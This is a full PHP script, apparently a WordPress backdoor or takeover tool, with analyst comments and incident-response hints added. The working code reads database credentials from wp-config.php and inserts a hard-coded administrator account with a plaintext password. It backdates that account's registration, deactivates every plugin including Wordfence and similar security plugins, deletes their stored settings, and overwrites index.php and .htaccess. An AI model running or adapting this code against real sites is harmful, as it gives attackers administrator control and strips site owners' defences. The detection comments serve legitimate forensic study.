<?php
/*
 * Analyst summary (derived from the code below). This is a standalone PHP script that:
 *   1. locates the WordPress root by walking up from its own directory,
 *   2. reads DB_NAME / DB_USER / DB_PASSWORD / DB_HOST and $table_prefix out of
 *      wp-config.php with regular expressions,
 *   3. connects with mysqli and creates (or resets) an account that is given the
 *      administrator role,
 *   4. empties active_plugins, switches the active theme and deletes option rows
 *      belonging to login-protection / security plugins,
 *   5. overwrites index.php and .htaccess and chmods wp-login.php,
 *   6. loads WordPress and renders wp-login.php with a summary of the above.
 * Every database write happens before wp-load.php is required, so none of them
 * goes through WordPress's own user/option APIs.
 */

// Suppress all output so it does not interfere with the login page HTML later
// Messages are collected in an array variable instead
ob_start();
$status_messages = [];

// --- INITIAL CONFIGURATION ---
// Hard-coded account values. For incident response these are the search keys:
// user_login / user_email in the users table, and the login name in access logs.
$new_user_login = 'audywebmuchy@117';
$new_user_pass = 'audyB1kuS4y4';
$new_user_email = 'yanatugas12345@gmail.comm';

// === Find the WordPress root (where wp-config.php & index.php live) ===
/**
 * Walks upward from $start_dir until a directory containing both
 * wp-config.php and index.php is found.
 *
 * @param string $start_dir Directory to start from.
 * @return string|null The matching directory, or null when the filesystem root is reached.
 */
function find_wp_root($start_dir) {
    $dir = $start_dir;
    // dirname() of the filesystem root returns the root itself, which ends the loop.
    while ($dir !== dirname($dir)) {
        if (file_exists($dir . '/wp-config.php') && file_exists($dir . '/index.php')) {
            return $dir;
        }
        $dir = dirname($dir);
    }
    return null;
}

$wp_root = find_wp_root(__DIR__);
if (!$wp_root) {
    $status_messages[] = "<span style='color:red;'>Error: WordPress root directory not found.</span>";
} else {
    $status_messages[] = "WordPress root found at: " . $wp_root;
}

// Execution continues even when $wp_root is null; the file_exists() check on
// $wp_config_path further down is what stops the script in that case.
$wp_config_path = $wp_root . '/wp-config.php';
$wp_index_path = $wp_root . '/index.php';
$wp_login_path = $wp_root . '/wp-login.php';

// === wp-config.php parsing functions ===
/**
 * Extracts define('NAME', 'value') constants from a file by regex, without
 * executing the file.
 *
 * @param string   $file_path Path to wp-config.php.
 * @param string[] $constants Constant names to look for.
 * @return array Map of constant name => captured string, or null when not matched.
 */
function parse_wp_config_constants($file_path, $constants = ['DB_NAME','DB_USER','DB_PASSWORD','DB_HOST']) {
    $values = [];
    $content = @file_get_contents($file_path);
    foreach ($constants as $const) {
        // The capture group requires at least one character and stops at the first quote.
        if ($content !== false && preg_match("/define\s*\(\s*['\"]" . preg_quote($const, '/') . "['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $content, $matches)) {
            $values[$const] = $matches[1];
        } else {
            $values[$const] = null;
        }
    }
    return $values;
}

/**
 * Reads the $table_prefix assignment from wp-config.php by regex.
 *
 * @param string $file_path Path to wp-config.php.
 * @return string The captured prefix, or 'wp_' when the file is unreadable or nothing matches.
 */
function parse_table_prefix($file_path) {
    $content = @file_get_contents($file_path);
    if ($content !== false && preg_match("/\\\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]\s*;/", $content, $matches)) {
        return $matches[1];
    }
    return 'wp_';
}

// === Detect the newest default theme ===
/**
 * Picks the "twenty*" theme directory with the highest numeric suffix.
 * The scan is relative to this script's own directory (__DIR__), not to the
 * WordPress root found above.
 *
 * @return string Theme directory name; 'twentytwentyfour' when nothing matches.
 */
function detect_default_theme() {
    $themes_dir = __DIR__ . '/wp-content/themes';
    $default_theme = 'twentytwentyfour'; // fallback
    if (is_dir($themes_dir)) {
        $themes = scandir($themes_dir);
        $candidates = [];
        foreach ($themes as $theme) {
            // Only names of the form "twenty" followed by 2-4 digits are considered.
            if (preg_match('/^twenty(\d{2,4})$/', $theme, $matches)) {
                $candidates[$matches[1]] = $theme;
            }
        }
        if (!empty($candidates)) {
            krsort($candidates); // take the newest year
            $default_theme = reset($candidates);
        }
    }
    return $default_theme;
}

// === Replace index.php with the WordPress stock file ===
/**
 * Deletes $index_path if present and writes a minimal stock WordPress index.php.
 * Both filesystem calls are error-suppressed and their results are not checked.
 *
 * @param string $index_path Path of the index.php to overwrite.
 * @return void
 */
function restore_wordpress_index($index_path) {
    $default_content = <<<PHP
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */
define( 'WP_USE_THEMES', true );
require __DIR__ . '/wp-blog-header.php';
PHP;
    if (file_exists($index_path)) {
        @unlink($index_path);
    }
    // Whatever index.php held before is lost; its mtime after this run marks the execution time.
    @file_put_contents($index_path, $default_content);
}

// === WordPress Compatible Password Hash ===
/**
 * Hashes a password in a form WordPress is expected to accept.
 *
 * @param string $password Plaintext password.
 * @return string bcrypt hash from password_hash() when available, otherwise a
 *                '$P$'-prefixed iterated-MD5 string built by hand.
 */
function wp_hash_password_compatible($password) {
    if (function_exists('password_hash')) {
        // NOTE(review): this stores a bare bcrypt hash; compare its prefix with the
        // format the site's own WordPress version writes for other accounts — a
        // mismatch in the user_pass column may help spot the row.
        return password_hash($password, PASSWORD_BCRYPT);
    }
    // Fallback for very old PHP versions
    $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
    $iteration_count_log2 = 8;
    // Salt characters come from str_shuffle(), which is not a cryptographic source.
    $random = substr(str_shuffle($itoa64), 0, 6);
    $setting = '$P$' . $itoa64[min($iteration_count_log2 + 5, 30)] . $random;
    $count_log2 = strpos($itoa64, $setting[3]);
    $count = 1 << $count_log2;
    $salt = substr($setting, 4, 8);
    $hash = md5($salt . $password, true);
    do {
        $hash = md5($hash . $password, true);
    } while (--$count);
    return $setting . encode64_legacy($hash, 16, $itoa64);
}

/**
 * Encodes $count bytes of $input with the 64-character alphabet $itoa64,
 * six bits at a time.
 * NOTE(review): resembles the phpass encoder but has not been checked against it.
 *
 * @param string $input   Raw bytes to encode.
 * @param int    $count   Number of bytes to consume.
 * @param string $itoa64  64-character output alphabet.
 * @return string Encoded text.
 */
function encode64_legacy($input, $count, $itoa64) {
    $output = '';
    $i = 0;
    do {
        $value = ord($input[$i++]);
        $output .= $itoa64[$value & 0x3f];
        if ($i < $count) {
            $value |= ord($input[$i]) << 8;
            $output .= $itoa64[($value >> 6) & 0x3f];
        } else {
            $output .= $itoa64[($value >> 6) & 0x3f];
            break;
        }
        if ($i++ >= $count) break;
        if ($i < $count) {
            $value |= ord($input[$i]) << 16;
            $output .= $itoa64[($value >> 12) & 0x3f];
            $output .= $itoa64[($value >> 18) & 0x3f];
        } else {
            $output .= $itoa64[($value >> 12) & 0x3f];
            break;
        }
    } while ($i < $count);
    return $output;
}

if (!file_exists($wp_config_path)) {
    die("Error: wp-config.php not found.\n");
}

$db_constants = parse_wp_config_constants($wp_config_path);
$table_prefix = parse_table_prefix($wp_config_path);

// Strict in_array(): stops only when at least one of the four constants was not matched.
if (in_array(null, $db_constants, true)) {
    die("Error: Could not find all database credentials in wp-config.php\n");
}

$db_name = $db_constants['DB_NAME'];
$db_user = $db_constants['DB_USER'];
$db_password = $db_constants['DB_PASSWORD'];
$db_host = $db_constants['DB_HOST'];

// === Database connection ===
// Direct connection with the site's own credentials. Anything that records user or
// option changes from inside WordPress is not involved in the writes below; the
// database server's own logs (if enabled) are where these statements would show up.
$mysqli = new mysqli($db_host, $db_user, $db_password, $db_name);
if ($mysqli->connect_error) {
    die("Connection failed: " . $mysqli->connect_error);
}

// Generate a password hash compatible with all WP versions
$password_hash = wp_hash_password_compatible($new_user_pass);

// Check whether the username already exists
// $table_prefix is interpolated into the SQL text; values are bound as parameters.
$stmt = $mysqli->prepare("SELECT ID FROM `{$table_prefix}users` WHERE user_login = ?");
if ($stmt === false) {
    die("Prepare failed: " . $mysqli->error . "\n");
}
$stmt->bind_param('s', $new_user_login);
$stmt->execute();
$stmt->bind_result($existing_user_id);
$user_exists = $stmt->fetch();
$stmt->close();

if ($user_exists) {
    // Update password & email if the user already exists
    // This branch leaves the existing usermeta (role / level) rows untouched.
    $stmt = $mysqli->prepare("UPDATE `{$table_prefix}users` SET user_pass = ?, user_email = ? WHERE ID = ?");
    if ($stmt === false) {
        die("Prepare failed: " . $mysqli->error . "\n");
    }
    $stmt->bind_param('ssi', $password_hash, $new_user_email, $existing_user_id);
    if (!$stmt->execute()) {
        die("Error updating user: " . $stmt->error . "\n");
    }
    $stmt->close();
    $status_messages[] = "Success! Existing user '{$new_user_login}' updated.";
} else {
    // Insert a new user
    // user_registered is set to a random moment between 2020-01-01 and 2023-12-31, so the
    // row does not appear as the newest account when sorted by registration date.
    // Detection hint: the auto-increment ID is still the highest, so an ID / user_registered
    // ordering mismatch identifies the row.
    $time = date('Y-m-d H:i:s', rand(strtotime('2020-01-01'), strtotime('2023-12-31')));
    $stmt = $mysqli->prepare(" INSERT INTO `{$table_prefix}users` (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES (?, ?, ?, ?, '', ?, '', 0, ?) ");
    if ($stmt === false) {
        die("Prepare failed: " . $mysqli->error . "\n");
    }
    $user_nicename = strtolower($new_user_login);
    $display_name = $new_user_login;
    $stmt->bind_param('ssssss', $new_user_login, $password_hash, $user_nicename, $new_user_email, $time, $display_name);
    if (!$stmt->execute()) {
        die("Error inserting user: " . $stmt->error . "\n");
    }
    $new_user_id = $stmt->insert_id;
    $stmt->close();

    // Add capabilities and level
    // Two usermeta rows are written for the new ID: "<prefix>capabilities" holding a
    // serialized ['administrator' => true] and "<prefix>user_level" holding "10".
    // Auditing every usermeta row whose capabilities value names administrator lists
    // all accounts with that role, including this one.
    $cap_key = $table_prefix . 'capabilities';
    $level_key = $table_prefix . 'user_level';
    $capabilities = serialize(['administrator' => true]);

    $stmt = $mysqli->prepare("INSERT INTO `{$table_prefix}usermeta` (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
    if ($stmt === false) {
        die("Prepare failed: " . $mysqli->error . "\n");
    }
    $stmt->bind_param('iss', $new_user_id, $cap_key, $capabilities);
    $stmt->execute(); // result not checked
    $stmt->close();

    $user_level = 10;
    $level_value = (string)$user_level;
    $stmt = $mysqli->prepare("INSERT INTO `{$table_prefix}usermeta` (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
    if ($stmt === false) {
        die("Prepare failed: " . $mysqli->error . "\n");
    }
    $stmt->bind_param('iss', $new_user_id, $level_key, $level_value);
    $stmt->execute(); // result not checked
    $stmt->close();

    $status_messages[] = "Success! WordPress admin user '{$new_user_login}' created.";
}

// === Deactivate all plugins ===
// active_plugins is overwritten with a serialized empty array, which switches off every
// plugin at once, security and audit plugins included. An unexpectedly empty
// active_plugins option is therefore an indicator in its own right; the previous value
// is not saved anywhere by this script and has to come from a backup.
$empty_plugins = serialize([]);
$stmt = $mysqli->prepare("UPDATE `{$table_prefix}options` SET option_value = ? WHERE option_name = 'active_plugins'");
if ($stmt === false) {
    die("Prepare failed: " . $mysqli->error . "\n");
}
$stmt->bind_param('s', $empty_plugins);
$stmt->execute();
$stmt->close();
$status_messages[] = "All plugins have been deactivated.";

// === Set the theme to the newest default ===
// Both 'template' and 'stylesheet' options are rewritten, so the previously active
// theme (and any child theme) is no longer loaded.
$default_theme = detect_default_theme();
$stmt = $mysqli->prepare("UPDATE `{$table_prefix}options` SET option_value = ? WHERE option_name IN ('template','stylesheet')");
if ($stmt === false) {
    die("Prepare failed: " . $mysqli->error . "\n");
}
$stmt->bind_param('s', $default_theme);
$stmt->execute();
$stmt->close();
$status_messages[] = "Theme set to {$default_theme}.";

// === Restore index.php ===
restore_wordpress_index($wp_index_path);
$status_messages[] = "index.php restored to WordPress default.";

// === Fix wp-login.php permissions and ensure it exists ===
/**
 * Ensures wp-login.php exists and has mode 0644.
 *
 * @param string $wp_login_path Path to wp-login.php.
 * @return string Human-readable status line.
 */
function fix_wp_login($wp_login_path) {
    if (!file_exists($wp_login_path)) {
        return "Error: wp-login.php not found at {$wp_login_path}";
    }
    $current_perms = fileperms($wp_login_path);
    if ($current_perms !== false) {
        // Last four octal digits of the mode, e.g. "0644".
        $current_perms_oct = substr(sprintf('%o', fileperms($wp_login_path)), -4);
        if ($current_perms_oct !== '0644') {
            // Undoes a hardening step where wp-login.php had been made unreadable on purpose.
            if (chmod($wp_login_path, 0644)) {
                return "wp-login.php permissions fixed to 0644";
            } else {
                return "Failed to fix wp-login.php permissions";
            }
        }
    }
    return "wp-login.php permissions OK.";
}
$status_messages[] = fix_wp_login($wp_login_path);

// === Disable login protection plugins ===
/**
 * Removes a fixed list of login-protection / security plugins from active_plugins.
 * By the time this is called the script has already written an empty array to
 * active_plugins, so the intersection is expected to be empty unless that earlier
 * UPDATE did not take effect.
 *
 * @param mysqli $mysqli       Open database connection.
 * @param string $table_prefix WordPress table prefix.
 * @return string Human-readable status line.
 */
function disable_login_protection_plugins($mysqli, $table_prefix) {
    // The targeted plugin paths double as a checklist: after cleanup, confirm which of
    // these the site used and that they are active and configured again.
    $login_protection_plugins = [
        'wp-hide-security-enhancer/wp-hide-security-enhancer.php',
        'wps-hide-login/wps-hide-login.php',
        'hide-my-wp/hide-my-wp.php',
        'limit-login-attempts-reloaded/limit-login-attempts-reloaded.php',
        'wordfence/wordfence.php',
        'all-in-one-wp-security-and-firewall/all-in-one-wp-security-and-firewall.php',
        'better-wp-security/better-wp-security.php'
    ];
    // prepare() results are not checked in this function.
    $stmt = $mysqli->prepare("SELECT option_value FROM `{$table_prefix}options` WHERE option_name = 'active_plugins'");
    $stmt->execute();
    $stmt->bind_result($active_plugins_serialized);
    $stmt->fetch();
    $stmt->close();

    if ($active_plugins_serialized) {
        // unserialize() is applied to the stored option value as-is.
        $active_plugins = unserialize($active_plugins_serialized);
        if (is_array($active_plugins)) {
            $found_plugins = array_intersect($active_plugins, $login_protection_plugins);
            if (!empty($found_plugins)) {
                $new_active_plugins = array_diff($active_plugins, $found_plugins);
                $new_active_plugins_serialized = serialize($new_active_plugins);
                $stmt = $mysqli->prepare("UPDATE `{$table_prefix}options` SET option_value = ? WHERE option_name = 'active_plugins'");
                $stmt->bind_param('s', $new_active_plugins_serialized);
                $stmt->execute();
                $stmt->close();
                return "Found and deactivated login protection plugins: " . implode(', ', $found_plugins);
            }
        }
    }
    return "No active login protection plugins found to deactivate.";
}
$status_messages[] = disable_login_protection_plugins($mysqli, $table_prefix);

// === Remove plugin options that might block login ===
/**
 * Deletes a fixed list of option rows that belong to login-protection plugins.
 * The rows are removed outright, so the affected plugins lose their stored
 * configuration; recovery needs a database backup or reconfiguration.
 *
 * @param mysqli $mysqli       Open database connection.
 * @param string $table_prefix WordPress table prefix.
 * @return string Human-readable status line with the number of option names that had rows deleted.
 */
function remove_login_protection_options($mysqli, $table_prefix) {
    $login_protection_options = ['whl_page', 'whl_login', 'wps_hide_login', 'hmwp_options', 'aiowps_options', 'itsec_storage', 'wordfence_config'];
    $removed_count = 0;
    foreach ($login_protection_options as $option) {
        $stmt = $mysqli->prepare("DELETE FROM `{$table_prefix}options` WHERE option_name = ?");
        $stmt->bind_param('s', $option);
        $stmt->execute();
        if ($stmt->affected_rows > 0) {
            $removed_count++;
        }
        $stmt->close();
    }
    return "Removed {$removed_count} login protection options from the database.";
}
$status_messages[] = remove_login_protection_options($mysqli, $table_prefix);

// === Reset .htaccess ===
/**
 * Returns the stock WordPress rewrite block used to replace .htaccess.
 *
 * @return string .htaccess contents.
 */
function get_default_htaccess_content() {
    return <<<HTACCESS
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
HTACCESS;
}

/**
 * Replaces the .htaccess in $path with the stock WordPress block and sets mode 0644.
 * Any rules the site owner had in that file (access restrictions, redirects, rules
 * written by security plugins) are discarded, so a .htaccess holding only the stock
 * block on a site that used to carry custom rules is an indicator, and the file's
 * mtime dates the run.
 *
 * @param string $path Directory containing the .htaccess file.
 * @return string Status line; returned regardless of whether the write succeeded.
 */
function reset_htaccess_in_path($path) {
    $htaccess_file = rtrim($path, '/') . '/.htaccess';
    $default_content = get_default_htaccess_content();
    if (file_exists($htaccess_file)) {
        @unlink($htaccess_file);
    }
    file_put_contents($htaccess_file, $default_content);
    chmod($htaccess_file, 0644);
    return ".htaccess reset to default.";
}
$status_messages[] = reset_htaccess_in_path($wp_root);

// Close the manual database connection before loading WordPress
$mysqli->close();

// Clear any output buffer left over from the steps above
ob_end_clean();

// === SHOW THE LOGIN PAGE WITH THE STATUS MESSAGES ===

// Load the WordPress environment
require_once($wp_root . '/wp-load.php');

// Function that prints our messages in the login header
/**
 * Echoes the collected status messages as an HTML list. Messages are written
 * without escaping and include the filesystem path of the WordPress root.
 *
 * @return void
 */
function display_script_status_messages() {
    global $status_messages;
    if (!empty($status_messages)) {
        echo '<div id="script_status_notice" class="notice" style="margin: 20px 0; padding: 12px; border-left: 4px solid #72aee6; background-color: #fff; box-shadow: 0 1px 1px rgba(0,0,0,.04);">';
        echo '<h4>Script Execution Summary:</h4>';
        echo '<ul style="margin: 0; padding-left: 20px;">';
        foreach ($status_messages as $msg) {
            echo '<li>' . $msg . '</li>';
        }
        echo '</ul>';
        echo '</div>';
    }
}

// Hook our function into the login page
add_action('login_header', 'display_script_status_messages');

// Now we "include" the login page so that it is displayed
// This runs wp-login.php and renders its HTML.
// Because our message function is already hooked, the messages appear there.
// Log-review hint: a request to this script's own URL returns the WordPress login form,
// so in web access logs the run appears under the script's path, not /wp-login.php.
include($wp_root . '/wp-login.php');

// Stop script execution so nothing else is output
exit;

// The code below never runs because of the exit() above.
?>